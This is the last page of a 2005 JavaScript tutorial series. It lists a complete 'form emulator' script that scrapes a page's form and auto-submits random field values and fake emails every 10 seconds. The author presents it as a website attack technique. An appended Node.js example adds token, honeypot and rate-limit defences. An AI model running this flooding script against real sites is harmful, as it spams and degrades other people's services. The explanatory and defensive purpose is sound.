Programmatic POST Requests with JavaScript: Form Emulator in Action
By: Alejandro Gervasio
    2005-08-03

    Programmatic POST Requests with JavaScript: Form Emulator in Action - The complete form emulator script: listing the full source code


    (Page 5 of 5 )

    To finish this tutorial, here is the full code for the form emulator script, including some basic (X)HTML markup and CSS declarations:

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html>
    <head>
    <title>Post Http Requests with JavaScript</title>
    <script type="text/javascript">

    function getXMLHTTPObject(){
        //instantiate new XMLHttpRequest object
        var objhttp=(window.XMLHttpRequest)?new XMLHttpRequest():new ActiveXObject('Microsoft.XMLHTTP');
        if(!objhttp){return};
        // assign event handler
        objhttp.onreadystatechange=displayStatus;
        // return XMLHttpRequest object
        return objhttp;
    }

    // function sendRequest
    function sendRequest(url,data,method,mode,header){
        // set default values
        if(!url){url='default_url.htm'};
        if(!data){data='defaultdata=defaultvalue'};
        if(!method){method='post'};
        if(!mode){mode=true};
        if(!header){header='Content-Type:application/x-www-form-urlencoded; charset=UTF-8'};
        // get XMLHttpRequest object
        objhttp=getXMLHTTPObject();
        // open socket connection
        objhttp.open(method,url,mode);
        // set http header
        objhttp.setRequestHeader(header.split(':')[0],header.split(':')[1]);
        // send data
        objhttp.send(data);
    }

    // function displayStatus
    function displayStatus(){
        // check XMLHttpRequest object status
        if(objhttp.readyState==4){
            // create paragraph elements
            var parStat=document.createElement('p');
            var parText=document.createElement('p');
            var parResp=document.createElement('p');
            // assign ID attributes
            parStat.id='status';
            parText.id='text';
            parResp.id='response';
            // append text nodes
            parStat.appendChild(document.createTextNode('Status : '+objhttp.status));
            parText.appendChild(document.createTextNode('Status text : '+objhttp.statusText));
            parResp.appendChild(document.createTextNode('Document code : '+objhttp.responseText));
            // insert <p> elements into document tree
            document.body.appendChild(parStat);
            document.body.appendChild(parText);
            document.body.appendChild(parResp);
            // get form code
            getFormCode();
        }
    }

    // function getFormCode
    function getFormCode(){
        // create <div> container
        var fdiv=document.createElement('div');
        // append <div> container into document tree
        document.body.appendChild(fdiv);
        // get page code
        var html=objhttp.responseText;
        // insert form code into document tree
        fdiv.innerHTML=html.substring(html.search(/<form\b/),html.search(/<\/form>/));
        // hide form from being displayed
        fdiv.style.display='none';
    }

    // function getFormVariables
    function getFormVariables(){
        var formvars='';
        var childElements=document.getElementsByTagName('form')[0].childNodes;
        for(var i=0;i<childElements.length;i++){
            if(/(INPUT|TEXTAREA|SELECT)/.test(childElements[i].nodeName)){
                // check if field name contains the string 'email'
                formvars+=(/mail/.test(childElements[i].getAttribute('name')))
                    ?childElements[i].getAttribute('name')+'='+getRandomEmail()+'&'
                    :childElements[i].getAttribute('name')+'='+getRandomValue()+'&';
            }
        }
        formvars=formvars.substring(0,formvars.length-1);
        return formvars;
    }

    // function getFormAction
    function getFormAction(){
        var formaction=document.getElementsByTagName('form')[0].getAttribute('action');
        if(!formaction){return};
        return formaction;
    }

    // function getRandomValue
    function getRandomValue(){
        var chars='abcdefghiklmnopqrstuvwxyz0123456789';
        var rndstring='';
        var strlength=Math.floor(Math.random()*8)+2;
        for(var i=0;i<strlength;i++){
            var rndvalue=Math.floor(Math.random()*chars.length);
            rndstring+=chars.substring(rndvalue,rndvalue+1);
        }
        return rndstring;
    }

    // function getRandomEmail
    function getRandomEmail(){
        return 'johndoe'+getRandomValue()+'@'+getRandomValue()+'.com';
    }

    window.onload=function(){
        if(document.getElementsByTagName&&document.createElement){
            // send first get request to form page
            sendRequest('post_form.htm','','get',false);
            // send post request every 10 seconds
            setInterval("sendRequest(getFormAction(),getFormVariables(),'post',true);",10*1000);
        }
    }

    </script>
    <style type="text/css">
    h1 {
        font: bold 12px Arial, Helvetica, sans-serif;
        color: #000;
    }
    p {
        font: normal 11px Arial, Helvetica, sans-serif;
        color: #00f;
    }
    </style>
    </head>
    <body>
    <h1>Emulating POST form submissions with JavaScript...</h1>
    </body>
    </html>

    In the code above, I've set the script to run once the page has finished loading, and declared a couple of CSS styles to control the visual presentation of the information. Quite simple, isn't it?

    Conclusion

    Over this series, I've covered in detail how JavaScript-based HTTP requests are implemented in practice as a growing means of attacking websites. The tutorials provided the basics of client-side denial-of-service attacks, as well as form emulation techniques.

    Of course, due to the inherently insecure nature of the Internet, and specifically the Web, new attack techniques are continuously emerging, so the methods described above are only a small part of this hostile landscape. Now that you've been warned, go and build more robust and safer Web programs.
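
    A server-side check against the form emulator listed above, as an added example that is not part of the original article: it relies on the emulator writing a random value into every form field and posting at a fixed interval. It is written for Node.js, and the secret, the limits and the hidden field names `form_token` and `website` are assumptions made for illustration.

```javascript
const crypto = require('crypto');

// Assumptions (not from the article): SECRET, the limits, and the hidden
// field names form_token and website are hypothetical.
const SECRET = 'constructed-demo-secret';
const TOKEN_TTL_MS = 10 * 60 * 1000;   // a rendered form stays valid 10 minutes
const WINDOW_MS = 60 * 1000;           // rate-limit window
const MAX_POSTS = 3;                   // POSTs allowed per client per window
const recent = new Map();              // clientId -> timestamps of recent POSTs

function sign(value) {
  return crypto.createHmac('sha256', SECRET).update(value).digest('hex');
}

// Called when the form page is rendered; the result goes in a hidden field.
function issueToken(clientId, now) {
  const body = `${now}.${crypto.randomBytes(8).toString('hex')}`;
  return `${body}.${sign(`${clientId}.${body}`)}`;
}

function tokenValid(token, clientId, now) {
  const parts = String(token || '').split('.');
  if (parts.length !== 3) return false;
  const [ts, nonce, mac] = parts;
  const given = Buffer.from(mac);
  const expected = Buffer.from(sign(`${clientId}.${ts}.${nonce}`));
  if (given.length !== expected.length) return false;
  if (!crypto.timingSafeEqual(given, expected)) return false;
  const age = now - Number(ts);
  return age >= 0 && age <= TOKEN_TTL_MS;
}

// Returns 'ok' or the reason the POST is rejected.
function checkSubmission(clientId, fields, now) {
  // Count every POST, rejected ones too, so a fixed-interval loop trips the limit.
  const hits = (recent.get(clientId) || []).filter(t => now - t < WINDOW_MS);
  hits.push(now);
  recent.set(clientId, hits);
  if (hits.length > MAX_POSTS) return 'rate_limited';
  // The emulator writes a random value into every field it finds, so a
  // honeypot field that real users leave empty comes back filled...
  if (fields.website) return 'honeypot_filled';
  // ...and the signed token comes back overwritten.
  if (!tokenValid(fields.form_token, clientId, now)) return 'bad_token';
  return 'ok';
}
```

    The token is bound to the client identifier and expires, and the rate limit still applies to a client that sends back a valid token on every request.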

